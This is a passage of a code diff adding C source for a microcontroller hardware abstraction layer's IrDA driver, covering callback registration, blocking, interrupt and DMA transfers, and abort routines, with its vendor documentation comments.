HAL_IRDA_RX_COMPLETE_CB_ID : + hirda->RxCpltCallback = pCallback; + break; + + case HAL_IRDA_ERROR_CB_ID : + hirda->ErrorCallback = pCallback; + break; + + case HAL_IRDA_ABORT_COMPLETE_CB_ID : + hirda->AbortCpltCallback = pCallback; + break; + + case HAL_IRDA_ABORT_TRANSMIT_COMPLETE_CB_ID : + hirda->AbortTransmitCpltCallback = pCallback; + break; + + case HAL_IRDA_ABORT_RECEIVE_COMPLETE_CB_ID : + hirda->AbortReceiveCpltCallback = pCallback; + break; + + case HAL_IRDA_MSPINIT_CB_ID : + hirda->MspInitCallback = pCallback; + break; + + case HAL_IRDA_MSPDEINIT_CB_ID : + hirda->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hirda->gState == HAL_IRDA_STATE_RESET) + { + switch (CallbackID) + { + case HAL_IRDA_MSPINIT_CB_ID : + hirda->MspInitCallback = pCallback; + break; + + case HAL_IRDA_MSPDEINIT_CB_ID : + hirda->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hirda); + + return status; +} + +/** + * @brief Unregister an IRDA callback + * IRDA callback is redirected to the weak predefined callback + * @param hirda irda handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_IRDA_TX_HALFCOMPLETE_CB_ID Tx Half Complete Callback ID + * @arg @ref HAL_IRDA_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_IRDA_RX_HALFCOMPLETE_CB_ID Rx Half Complete Callback ID + * @arg @ref HAL_IRDA_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_IRDA_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_IRDA_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_IRDA_ABORT_TRANSMIT_COMPLETE_CB_ID Abort Transmit Complete Callback ID + * @arg @ref HAL_IRDA_ABORT_RECEIVE_COMPLETE_CB_ID Abort Receive Complete Callback ID + * @arg @ref HAL_IRDA_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_IRDA_MSPDEINIT_CB_ID MspDeInit Callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_UnRegisterCallback(IRDA_HandleTypeDef *hirda, HAL_IRDA_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hirda); + + if (HAL_IRDA_STATE_READY == hirda->gState) + { + switch (CallbackID) + { + case HAL_IRDA_TX_HALFCOMPLETE_CB_ID : + hirda->TxHalfCpltCallback = HAL_IRDA_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + break; + + case HAL_IRDA_TX_COMPLETE_CB_ID : + hirda->TxCpltCallback = HAL_IRDA_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_IRDA_RX_HALFCOMPLETE_CB_ID : + hirda->RxHalfCpltCallback = HAL_IRDA_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + break; + + case HAL_IRDA_RX_COMPLETE_CB_ID : + hirda->RxCpltCallback = HAL_IRDA_RxCpltCallback; /* Legacy weak RxCpltCallback */ + break; + + case HAL_IRDA_ERROR_CB_ID : + hirda->ErrorCallback = HAL_IRDA_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_IRDA_ABORT_COMPLETE_CB_ID : + hirda->AbortCpltCallback = HAL_IRDA_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_IRDA_ABORT_TRANSMIT_COMPLETE_CB_ID : + hirda->AbortTransmitCpltCallback = HAL_IRDA_AbortTransmitCpltCallback; /* Legacy weak AbortTransmitCpltCallback */ + break; + + case HAL_IRDA_ABORT_RECEIVE_COMPLETE_CB_ID : + hirda->AbortReceiveCpltCallback = HAL_IRDA_AbortReceiveCpltCallback; /* Legacy weak AbortReceiveCpltCallback */ + break; + + case HAL_IRDA_MSPINIT_CB_ID : + hirda->MspInitCallback = HAL_IRDA_MspInit; /* Legacy weak MspInitCallback */ + break; + + case HAL_IRDA_MSPDEINIT_CB_ID : + hirda->MspDeInitCallback = HAL_IRDA_MspDeInit; /* Legacy weak MspDeInitCallback */ + break; + + default : + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_IRDA_STATE_RESET == hirda->gState) + { + switch (CallbackID) + { + case HAL_IRDA_MSPINIT_CB_ID : + hirda->MspInitCallback = HAL_IRDA_MspInit; + break; + + case HAL_IRDA_MSPDEINIT_CB_ID : + hirda->MspDeInitCallback = HAL_IRDA_MspDeInit; + break; + + default : + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hirda); + + return status; +} +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup IRDA_Exported_Functions_Group2 IO operation functions + * @brief IRDA Transmit and Receive functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to manage the IRDA data transfers. + IrDA is a half duplex communication protocol. If the Transmitter is busy, any data + on the IrDA receive line will be ignored by the IrDA decoder and if the Receiver + is busy, data on the TX from the USART to IrDA will not be encoded by IrDA. + While receiving data, transmission should be avoided as the data to be transmitted + could be corrupted. + + (#) There are two modes of transfer: + (++) Blocking mode: The communication is performed in polling mode. + The HAL status of all data processing is returned by the same function + after finishing transfer. + (++) Non-Blocking mode: The communication is performed using Interrupts + or DMA, these API's return the HAL status. + The end of the data processing will be indicated through the + dedicated IRDA IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + The HAL_IRDA_TxCpltCallback(), HAL_IRDA_RxCpltCallback() user callbacks + will be executed respectively at the end of the Transmit or Receive process + The HAL_IRDA_ErrorCallback() user callback will be executed when a communication error is detected + + (#) Blocking mode APIs are : + (++) HAL_IRDA_Transmit() + (++) HAL_IRDA_Receive() + + (#) Non Blocking mode APIs with Interrupt are : + (++) HAL_IRDA_Transmit_IT() + (++) HAL_IRDA_Receive_IT() + (++) HAL_IRDA_IRQHandler() + + (#) Non Blocking mode functions with DMA are : + (++) HAL_IRDA_Transmit_DMA() + (++) HAL_IRDA_Receive_DMA() + (++) HAL_IRDA_DMAPause() + (++) HAL_IRDA_DMAResume() + (++) HAL_IRDA_DMAStop() + + (#) A set of Transfer Complete Callbacks are provided in Non Blocking mode: + (++) HAL_IRDA_TxHalfCpltCallback() + (++) HAL_IRDA_TxCpltCallback() + (++) HAL_IRDA_RxHalfCpltCallback() + (++) HAL_IRDA_RxCpltCallback() + (++) HAL_IRDA_ErrorCallback() + + (#) Non-Blocking mode transfers could be aborted using Abort API's : + (+) HAL_IRDA_Abort() + (+) HAL_IRDA_AbortTransmit() + (+) HAL_IRDA_AbortReceive() + (+) HAL_IRDA_Abort_IT() + (+) HAL_IRDA_AbortTransmit_IT() + (+) HAL_IRDA_AbortReceive_IT() + + (#) For Abort services based on interrupts (HAL_IRDA_Abortxxx_IT), a set of Abort Complete Callbacks are provided: + (+) HAL_IRDA_AbortCpltCallback() + (+) HAL_IRDA_AbortTransmitCpltCallback() + (+) HAL_IRDA_AbortReceiveCpltCallback() + + (#) In Non-Blocking mode transfers, possible errors are split into 2 categories. + Errors are handled as follows : + (+) Error is considered as Recoverable and non blocking : Transfer could go till end, but error severity is + to be evaluated by user : this concerns Frame Error, Parity Error or Noise Error in Interrupt mode reception . + Received character is then retrieved and stored in Rx buffer, Error code is set to allow user to identify error type, + and HAL_IRDA_ErrorCallback() user callback is executed. Transfer is kept ongoing on IRDA side. + If user wants to abort it, Abort services should be called by user. + (+) Error is considered as Blocking : Transfer could not be completed properly and is aborted. + This concerns Overrun Error In Interrupt mode reception and all errors in DMA mode. + Error code is set to allow user to identify error type, and HAL_IRDA_ErrorCallback() user callback is executed. + +@endverbatim + * @{ + */ + +/** + * @brief Sends an amount of data in blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must reflect the number + * of u16 available through pData. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent. + * @param Timeout Specify timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Transmit(IRDA_HandleTypeDef *hirda, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint16_t *tmp; + uint32_t tickstart = 0U; + + /* Check that a Tx process is not already ongoing */ + if (hirda->gState == HAL_IRDA_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hirda); + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->gState = HAL_IRDA_STATE_BUSY_TX; + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hirda->TxXferSize = Size; + hirda->TxXferCount = Size; + while (hirda->TxXferCount > 0U) + { + hirda->TxXferCount--; + if (hirda->Init.WordLength == IRDA_WORDLENGTH_9B) + { + if (IRDA_WaitOnFlagUntilTimeout(hirda, IRDA_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + tmp = (uint16_t *) pData; + hirda->Instance->DR = (*tmp & (uint16_t)0x01FF); + if (hirda->Init.Parity == IRDA_PARITY_NONE) + { + pData += 2U; + } + else + { + pData += 1U; + } + } + else + { + if (IRDA_WaitOnFlagUntilTimeout(hirda, IRDA_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + hirda->Instance->DR = (*pData++ & (uint8_t)0xFF); + } + } + + if (IRDA_WaitOnFlagUntilTimeout(hirda, IRDA_FLAG_TC, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* At end of Tx process, restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must reflect the number + * of u16 available through pData. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @param Timeout Specify timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Receive(IRDA_HandleTypeDef *hirda, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint16_t *tmp; + uint32_t tickstart = 0U; + + /* Check that a Rx process is not already ongoing */ + if (hirda->RxState == HAL_IRDA_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hirda); + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->RxState = HAL_IRDA_STATE_BUSY_RX; + + /* Init tickstart for timeout management*/ + tickstart = HAL_GetTick(); + + hirda->RxXferSize = Size; + hirda->RxXferCount = Size; + + /* Check the remain data to be received */ + while (hirda->RxXferCount > 0U) + { + hirda->RxXferCount--; + + if (hirda->Init.WordLength == IRDA_WORDLENGTH_9B) + { + if (IRDA_WaitOnFlagUntilTimeout(hirda, IRDA_FLAG_RXNE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + tmp = (uint16_t *) pData ; + if (hirda->Init.Parity == IRDA_PARITY_NONE) + { + *tmp = (uint16_t)(hirda->Instance->DR & (uint16_t)0x01FF); + pData += 2U; + } + else + { + *tmp = (uint16_t)(hirda->Instance->DR & (uint16_t)0x00FF); + pData += 1U; + } + } + else + { + if (IRDA_WaitOnFlagUntilTimeout(hirda, IRDA_FLAG_RXNE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + if (hirda->Init.Parity == IRDA_PARITY_NONE) + { + *pData++ = (uint8_t)(hirda->Instance->DR & (uint8_t)0x00FF); + } + else + { + *pData++ = (uint8_t)(hirda->Instance->DR & (uint8_t)0x007F); + } + } + } + + /* At end of Rx process, restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Send an amount of data in non blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must reflect the number + * of u16 available through pData. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Transmit_IT(IRDA_HandleTypeDef *hirda, uint8_t *pData, uint16_t Size) +{ + /* Check that a Tx process is not already ongoing */ + if (hirda->gState == HAL_IRDA_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hirda); + + hirda->pTxBuffPtr = pData; + hirda->TxXferSize = Size; + hirda->TxXferCount = Size; + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->gState = HAL_IRDA_STATE_BUSY_TX; + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + /* Enable the IRDA Transmit Data Register Empty Interrupt */ + SET_BIT(hirda->Instance->CR1, USART_CR1_TXEIE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive an amount of data in non blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must reflect the number + * of u16 available through pData. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Receive_IT(IRDA_HandleTypeDef *hirda, uint8_t *pData, uint16_t Size) +{ + /* Check that a Rx process is not already ongoing */ + if (hirda->RxState == HAL_IRDA_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hirda); + + hirda->pRxBuffPtr = pData; + hirda->RxXferSize = Size; + hirda->RxXferCount = Size; + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->RxState = HAL_IRDA_STATE_BUSY_RX; + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + /* Enable the IRDA Parity Error and Data Register Not Empty Interrupts */ + SET_BIT(hirda->Instance->CR1, USART_CR1_PEIE | USART_CR1_RXNEIE); + + /* Enable the IRDA Error Interrupt: (Frame error, Noise error, Overrun error) */ + SET_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Send an amount of data in DMA mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must reflect the number + * of u16 available through pData. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Transmit_DMA(IRDA_HandleTypeDef *hirda, uint8_t *pData, uint16_t Size) +{ + uint32_t *tmp; + + /* Check that a Tx process is not already ongoing */ + if (hirda->gState == HAL_IRDA_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hirda); + + hirda->pTxBuffPtr = pData; + hirda->TxXferSize = Size; + hirda->TxXferCount = Size; + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->gState = HAL_IRDA_STATE_BUSY_TX; + + /* Set the IRDA DMA transfer complete callback */ + hirda->hdmatx->XferCpltCallback = IRDA_DMATransmitCplt; + + /* Set the IRDA DMA half transfer complete callback */ + hirda->hdmatx->XferHalfCpltCallback = IRDA_DMATransmitHalfCplt; + + /* Set the DMA error callback */ + hirda->hdmatx->XferErrorCallback = IRDA_DMAError; + + /* Set the DMA abort callback */ + hirda->hdmatx->XferAbortCallback = NULL; + + /* Enable the IRDA transmit DMA stream */ + tmp = (uint32_t *)&pData; + HAL_DMA_Start_IT(hirda->hdmatx, *(uint32_t *)tmp, (uint32_t)&hirda->Instance->DR, Size); + + /* Clear the TC flag in the SR register by writing 0 to it */ + __HAL_IRDA_CLEAR_FLAG(hirda, IRDA_FLAG_TC); + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + /* Enable the DMA transfer for transmit request by setting the DMAT bit + in the USART CR3 register */ + SET_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives an amount of data in DMA mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must reflect the number + * of u16 available through pData. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @note When the IRDA parity is enabled (PCE = 1) the data received contain the parity bit. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Receive_DMA(IRDA_HandleTypeDef *hirda, uint8_t *pData, uint16_t Size) +{ + uint32_t *tmp; + + /* Check that a Rx process is not already ongoing */ + if (hirda->RxState == HAL_IRDA_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hirda); + + hirda->pRxBuffPtr = pData; + hirda->RxXferSize = Size; + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->RxState = HAL_IRDA_STATE_BUSY_RX; + + /* Set the IRDA DMA transfer complete callback */ + hirda->hdmarx->XferCpltCallback = IRDA_DMAReceiveCplt; + + /* Set the IRDA DMA half transfer complete callback */ + hirda->hdmarx->XferHalfCpltCallback = IRDA_DMAReceiveHalfCplt; + + /* Set the DMA error callback */ + hirda->hdmarx->XferErrorCallback = IRDA_DMAError; + + /* Set the DMA abort callback */ + hirda->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + tmp = (uint32_t *)&pData; + HAL_DMA_Start_IT(hirda->hdmarx, (uint32_t)&hirda->Instance->DR, *(uint32_t *)tmp, Size); + + /* Clear the Overrun flag just before enabling the DMA Rx request: can be mandatory for the second transfer */ + __HAL_IRDA_CLEAR_OREFLAG(hirda); + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + /* Enable the IRDA Parity Error Interrupt */ + SET_BIT(hirda->Instance->CR1, USART_CR1_PEIE); + + /* Enable the IRDA Error Interrupt: (Frame error, Noise error, Overrun error) */ + SET_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Enable the DMA transfer for the receiver request by setting the DMAR bit + in the USART CR3 register */ + SET_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Pauses the DMA Transfer. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_DMAPause(IRDA_HandleTypeDef *hirda) +{ + uint32_t dmarequest = 0x00U; + + /* Process Locked */ + __HAL_LOCK(hirda); + + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT); + if ((hirda->gState == HAL_IRDA_STATE_BUSY_TX) && dmarequest) + { + /* Disable the IRDA DMA Tx request */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + } + + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR); + if ((hirda->RxState == HAL_IRDA_STATE_BUSY_RX) && dmarequest) + { + /* Disable PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, USART_CR1_PEIE); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Disable the IRDA DMA Rx request */ + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + return HAL_OK; +} + +/** + * @brief Resumes the DMA Transfer. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_DMAResume(IRDA_HandleTypeDef *hirda) +{ + /* Process Locked */ + __HAL_LOCK(hirda); + + if (hirda->gState == HAL_IRDA_STATE_BUSY_TX) + { + /* Enable the IRDA DMA Tx request */ + SET_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + } + + if (hirda->RxState == HAL_IRDA_STATE_BUSY_RX) + { + /* Clear the Overrun flag before resuming the Rx transfer */ + __HAL_IRDA_CLEAR_OREFLAG(hirda); + + /* Re-enable PE and ERR (Frame error, noise error, overrun error) interrupts */ + SET_BIT(hirda->Instance->CR1, USART_CR1_PEIE); + SET_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Enable the IRDA DMA Rx request */ + SET_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + } + + /* Process Unlocked */ + __HAL_UNLOCK(hirda); + + return HAL_OK; +} + +/** + * @brief Stops the DMA Transfer. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_DMAStop(IRDA_HandleTypeDef *hirda) +{ + uint32_t dmarequest = 0x00U; + /* The Lock is not implemented on this API to allow the user application + to call the HAL IRDA API under callbacks HAL_IRDA_TxCpltCallback() / HAL_IRDA_RxCpltCallback(): + when calling HAL_DMA_Abort() API the DMA TX/RX Transfer complete interrupt is generated + and the correspond call back is executed HAL_IRDA_TxCpltCallback() / HAL_IRDA_RxCpltCallback() + */ + + /* Stop IRDA DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT); + if ((hirda->gState == HAL_IRDA_STATE_BUSY_TX) && dmarequest) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + /* Abort the IRDA DMA Tx channel */ + if (hirda->hdmatx != NULL) + { + HAL_DMA_Abort(hirda->hdmatx); + } + IRDA_EndTxTransfer(hirda); + } + + /* Stop IRDA DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR); + if ((hirda->RxState == HAL_IRDA_STATE_BUSY_RX) && dmarequest) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* Abort the IRDA DMA Rx channel */ + if (hirda->hdmarx != NULL) + { + HAL_DMA_Abort(hirda->hdmarx); + } + IRDA_EndRxTransfer(hirda); + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing transfers (blocking mode). + * @param hirda IRDA handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_IRDA_Abort(IRDA_HandleTypeDef *hirda) +{ + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Disable the IRDA DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + /* Abort the IRDA DMA Tx channel : use blocking DMA Abort API (no callback) */ + if (hirda->hdmatx != NULL) + { + /* Set the IRDA DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hirda->hdmatx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hirda->hdmatx); + } + } + + /* Disable the IRDA DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* Abort the IRDA DMA Rx channel : use blocking DMA Abort API (no callback) */ + if (hirda->hdmarx != NULL) + { + /* Set the IRDA DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hirda->hdmarx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hirda->hdmarx); + } + } + + /* Reset Tx and Rx transfer counters */ + hirda->TxXferCount = 0x00U; + hirda->RxXferCount = 0x00U; + + /* Reset ErrorCode */ + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + + /* Restore hirda->RxState and hirda->gState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + hirda->gState = HAL_IRDA_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing Transmit transfer (blocking mode). + * @param hirda IRDA handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_IRDA_AbortTransmit(IRDA_HandleTypeDef *hirda) +{ + /* Disable TXEIE and TCIE interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_TXEIE | USART_CR1_TCIE)); + + /* Disable the IRDA DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAT); + + /* Abort the IRDA DMA Tx channel : use blocking DMA Abort API (no callback) */ + if (hirda->hdmatx != NULL) + { + /* Set the IRDA DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hirda->hdmatx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hirda->hdmatx); + } + } + + /* Reset Tx transfer counter */ + hirda->TxXferCount = 0x00U; + + /* Restore hirda->gState to Ready */ + hirda->gState = HAL_IRDA_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing Receive transfer (blocking mode). + * @param hirda IRDA handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status +*/ +HAL_StatusTypeDef HAL_IRDA_AbortReceive(IRDA_HandleTypeDef *hirda) +{ + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(hirda->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE)); + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_EIE); + + /* Disable the IRDA DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(hirda->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(hirda->Instance->CR3, USART_CR3_DMAR); + + /* Abort the IRDA DMA Rx channel : use blocking DMA Abort API (no callback) */ + if (hirda->hdmarx != NULL) + { + /* Set the IRDA DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + hirda->hdmarx->XferAbortCallback = NULL; + + HAL_DMA_Abort(hirda->hdmarx); + } + } + + /* Reset Rx transfer counter */ + hirda->RxXferCount = 0x00U; + + /* Restore hirda->RxState to Ready */ + hirda->RxState = HAL_IRDA_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Abort ongoing transfers (Interrupt mode). + * @param hirda IRDA handle. + * @note This procedure could be used for aborting any ongoing transfer started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At 